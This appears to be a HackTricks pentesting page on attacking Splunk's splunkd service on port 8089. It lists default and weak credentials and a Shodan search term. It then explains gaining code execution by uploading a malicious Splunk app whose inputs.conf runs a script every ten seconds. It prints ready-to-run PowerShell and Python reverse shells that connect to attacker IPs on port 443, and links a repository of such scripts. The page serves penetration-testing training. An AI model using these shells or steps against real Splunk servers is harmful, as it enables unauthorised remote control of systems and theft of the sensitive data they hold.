# 8089 - Pentesting Splunkd {{#include ../banners/hacktricks-training.md}} ## **Basic Information** - Log analytics tool used for data gathering, analysis, and visualization - Commonly used in security monitoring and business analytics - Default ports: - Web server: 8000 - Splunkd service: 8089 ### Vulnerability Vectors: 1. Free Version Exploitation - Trial version automatically converts to free version after 60 days - Free version lacks authentication - Potential security risk if left unmanaged - Administrators may overlook security implications 2. Credential Weaknesses - Older versions: Default credentials `admin:changeme` - Newer versions: Credentials set during installation - Potential for weak password use (e.g., `admin`, `Welcome`, `Password123`) 3. Remote Code Execution Opportunities - Multiple code execution methods: - Server-side Django applications - REST endpoints - Scripted inputs - Alerting scripts - Cross-platform support (Windows/Linux) - Scripted inputs can run: - Bash scripts - PowerShell scripts - Batch scripts Key Exploitation Potential: - Sensitive data storage - Lack of authentication in free version - Multiple vectors for potential remote code execution - Possibility of leveraging scripted inputs for system compromise ### Shodan - `Splunk build` ## RCE ### Create Custom Application Splunk offers a sophisticated method for remote code execution through custom application deployment, leveraging its cross-platform scripting capabilities. The core exploitation technique revolves around creating a malicious application that can execute reverse shells on both Windows and Linux systems. A custom application can run **Python, Batch, Bash, or PowerShell scripts**. Moreover, **Splunk comes with Python installed**, so even in **Windows** systems you will be able to run python code. You can use [**this**](https://github.com/0xjpuff/reverse_shell_splunk) example with the **`bin`** containing example for [Python](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/rev.py) and [PowerShell](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/run.ps1). Or you could create your own. The exploitation process follows a consistent methodology across platforms: ``` splunk_shell/ ├── bin (reverse shell scripts) └── default (inputs.conf configuration) ``` The critical configuration file `inputs.conf` enables the script by: - Setting `disabled = 0` - Configuring a 10-second execution interval - Defining the script's source type Deployment is straightforward: 1. Create the malicious application package 2. Set up a listener (Netcat/socat) on the attacking machine 3. Upload the application through Splunk's interface 4. Trigger automatic script execution upon upload Sample Windows PowerShell reverse shell: ```bash $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close() ``` Sample Linux Python reverse shell: ```python import sys, socket, os, pty ip = "10.10.14.15" port = "443" s = socket.socket() s.connect((ip, int(port))) [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)] pty.spawn('/bin/bash') ``` ### RCE & Privilege Escalation In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence: {{#ref}} ../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md {{#endref}} ## References - [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213) {{#include ../banners/hacktricks-training.md}}